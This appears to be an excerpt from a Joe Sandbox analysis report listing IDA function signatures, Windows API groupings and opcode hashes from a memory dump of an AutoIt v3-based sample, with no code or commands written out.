                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _onexit
                                                                        • String ID:
                                                                        • API String ID: 572287377-0
                                                                        • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                        • Instruction ID: a4d47d55f18a46fa708c8784afa62596fb87b6a027c9abd87b33ea9192a481f5
                                                                        • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                        • Instruction Fuzzy Hash: 44C01210E5A04B81E90877BE489707401902FAD30CF900575C20DD02A2DD0C52E60F51
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentVersionWow64_onexit
                                                                        • String ID:
                                                                        • API String ID: 2932345936-0
                                                                        • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                        • Instruction ID: 9aa3d0d4637d5bcc66f1608989480c868e70902b52d2f3c941f68efec912d05d
                                                                        • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                        • Instruction Fuzzy Hash: F1C00251E6A48B81E61877BE48970B411946FAD34CF900536D71DD12A2DD1C52E64E21
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1452528299-0
                                                                        • Opcode ID: e5acb69707dc582a49b6867ff9037b7b751d07d439139e28c608b8377ee6a61c
                                                                        • Instruction ID: 067bc29ece086fb7d716c1bc3be654cea6d2b0a41e0d6714efd00fd6afa823a2
                                                                        • Opcode Fuzzy Hash: e5acb69707dc582a49b6867ff9037b7b751d07d439139e28c608b8377ee6a61c
                                                                        • Instruction Fuzzy Hash: 2B717622B04A4286EB14EF69D5903BD33A0FB89B88F404132DF1E977A6DF38E559C750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 4292702814-0
                                                                        • Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                        • Instruction ID: cff4e418a71d1c915fb385feb7f08c698be2e704ddb2010fe8b908c6e16e9548
                                                                        • Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                        • Instruction Fuzzy Hash: F4F09044B0A207C4FE54AB6E9851BB51290BF9CB88F8C4030CB0EC63F2EE2CE4818314
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 4292702814-0
                                                                        • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                        • Instruction ID: d2b6935b2ff4c71c85296e6bc1f7accca2d399d85716b6a409ab170948b90011
                                                                        • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                        • Instruction Fuzzy Hash: F1F08C40F2D24785FE249FB9684167851907F8EBE8F484230DF2ECA2E2DEACE4808714
                                                                        APIs
                                                                        • CloseHandle.KERNELBASE(?,?,00000001,00007FF6BB12836F,?,?,?,00007FF6BB12E7E7), ref: 00007FF6BB12833D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle
                                                                        • String ID:
                                                                        • API String ID: 2962429428-0
                                                                        • Opcode ID: ee0b3854a55e6d386332b09172a2bebdb13c6c40f32be3cd2150d61c605b23c5
                                                                        • Instruction ID: ca85cdb5fc8e29f63a185b13eb5006234b8f490ef549d720ee3395e4a6f01352
                                                                        • Opcode Fuzzy Hash: ee0b3854a55e6d386332b09172a2bebdb13c6c40f32be3cd2150d61c605b23c5
                                                                        • Instruction Fuzzy Hash: 18E0B6A3E24A06C6EB144B25E44533822A0FB28B7EF650721D73C852D9DF7CDAA48680
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                        • API String ID: 2211948467-2373415609
                                                                        • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                        • Instruction ID: 36569a05da31eb7f6916462f15693c8aeacb247e05007f5584d29892ce1d6d5a
                                                                        • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                        • Instruction Fuzzy Hash: DF225B76A08A828AEB14DF29E85456A77A1FB8CB98F504235DF4E87B74DF3CD445CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 1993697042-4164748364
                                                                        • Opcode ID: e7992e5e1d6abc7067500734153cecba052fd935204e75541dffe076f882d139
                                                                        • Instruction ID: 2b9b46fd7581cab149518ae1379cf880774ee86a443e468d1e0dc52d816e0a40
                                                                        • Opcode Fuzzy Hash: e7992e5e1d6abc7067500734153cecba052fd935204e75541dffe076f882d139
                                                                        • Instruction Fuzzy Hash: B4528F32A58A4296EB648F69E4846BD7761FF88B88F544136DB1E83BB4CF3CE454C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                        • String ID:
                                                                        • API String ID: 3481653762-0
                                                                        • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                        • Instruction ID: 029db1afffa3f229d69e5fddf1adb580145d9d92d2df61127f59264163e63449
                                                                        • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                        • Instruction Fuzzy Hash: D1328F36A08A8286E754CF29E4546BE77A0FB89B88F504135DF5E87BA4CF3CE545CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 1218376639-328681919
                                                                        • Opcode ID: 0f4015de1ff5bd974f5b094960a9c4c11c15eb3d961b28bc7fd33685930cdf6e
                                                                        • Instruction ID: fc16fc6bc6f27a8766f0834d899d78a04030886dae00b0617cef2307ef007f6a
                                                                        • Opcode Fuzzy Hash: 0f4015de1ff5bd974f5b094960a9c4c11c15eb3d961b28bc7fd33685930cdf6e
                                                                        • Instruction Fuzzy Hash: 8F12C232A0964686F7508B2DE4546BE23A0FF89B98F504131DB1DCBBB5CF3CE8428B00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                        • String ID: P
                                                                        • API String ID: 1208186926-3110715001
                                                                        • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                        • Instruction ID: f9f2476ade7c0e5719772f9264fc6a43375aa7345b8b90f107cc9fec3cbf8781
                                                                        • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                        • Instruction Fuzzy Hash: C3120572A0869286F7248B2DE4547BD27A0FB89798F504535DF4E8BAE4CF3DE451CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-2439800395
                                                                        • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                        • Instruction ID: aa4670771d127d532972751643d19d208f12310c9c4108c1dc1a3687d105ff39
                                                                        • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                        • Instruction Fuzzy Hash: 03E16F76A08A818AE714DF69F85066A77A0FB8DB98F504135EB4E83B74CF7CE445CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 3778422247-2988720461
                                                                        • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                        • Instruction ID: e040b90c1bc4ca4998cc5c174d449c2e48414b9de83b08e1f732971e52eeaaf9
                                                                        • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                        • Instruction Fuzzy Hash: 6A417521F58A1283F7145B2EF81463A6392BF8CB89F945035CA0EC7B74DF3DA84A8740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                        • String ID:
                                                                        • API String ID: 3372153169-0
                                                                        • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                        • Instruction ID: 6bcf443f164854b5de86b53d4b2378c911698cd0d67a6760d6bc24f4aa3b5f29
                                                                        • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                        • Instruction Fuzzy Hash: 70227D72A09A8286EB648F29D4946BD27A1FF8DB98F544136CB5EC76B4DF3DE441C300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                        • String ID: default$winsta0$winsta0\default
                                                                        • API String ID: 3202303201-1423368268
                                                                        • Opcode ID: 57d89c1fdddb6536622cb78b9a77b7238ee294b83d91f9da3f3c77b25036669e
                                                                        • Instruction ID: d082cbde556c2d1d1280ea061dbe176df29fd9c49e099d93a6fab2d592d9acb7
                                                                        • Opcode Fuzzy Hash: 57d89c1fdddb6536622cb78b9a77b7238ee294b83d91f9da3f3c77b25036669e
                                                                        • Instruction Fuzzy Hash: 59A14232B08B4186E711DF69E8506AA67A1FF89B98F444139EF5D87BA8DF3CE005C750
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: 720722d4329554f9f6e8e12540f66d0c5cc445a0c9ca5b3f60b71e572b096138
                                                                        • Instruction ID: f4aa84fa8cf4ad6c9dbb03d74ceeea30c162477ca0bb0da22a9788e130fd272a
                                                                        • Opcode Fuzzy Hash: 720722d4329554f9f6e8e12540f66d0c5cc445a0c9ca5b3f60b71e572b096138
                                                                        • Instruction Fuzzy Hash: 61D13A36A14A528AEB14DF7DE8546AD37A1FB88B5CF100135DB0E97BA8DF38E444C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 2880407647-0
                                                                        • Opcode ID: ce3caaf699caba12f71b3e9f0da339f933c6cfb778c9e215de14da521d683320
                                                                        • Instruction ID: 50f10a0ccf41f627ce6ca81f2062d64a7c858f59fe5d264ddac045300b884530
                                                                        • Opcode Fuzzy Hash: ce3caaf699caba12f71b3e9f0da339f933c6cfb778c9e215de14da521d683320
                                                                        • Instruction Fuzzy Hash: 3203C372A081C28FE7758E69D554BF937A5FB8878CF400135DB09A7B68DF38AA44CB44
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                        • String ID:
                                                                        • API String ID: 3222323430-0
                                                                        • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                        • Instruction ID: 21ba6651704f9bdc90ac09c199a7a7d0f436e5ff1d2ecaa65aa0971427a93eda
                                                                        • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                        • Instruction Fuzzy Hash: E1714D21B09A4286EA24AB19E49827D2361FF8DB8DF444035DB4EC77B5DF3CE606C754
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                        • String ID:
                                                                        • API String ID: 3215588206-0
                                                                        • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                        • Instruction ID: fd6d994eccd07dc35a91bbc6cd25d2d543a09fb1dc6793f981a7c80e4ed00d28
                                                                        • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
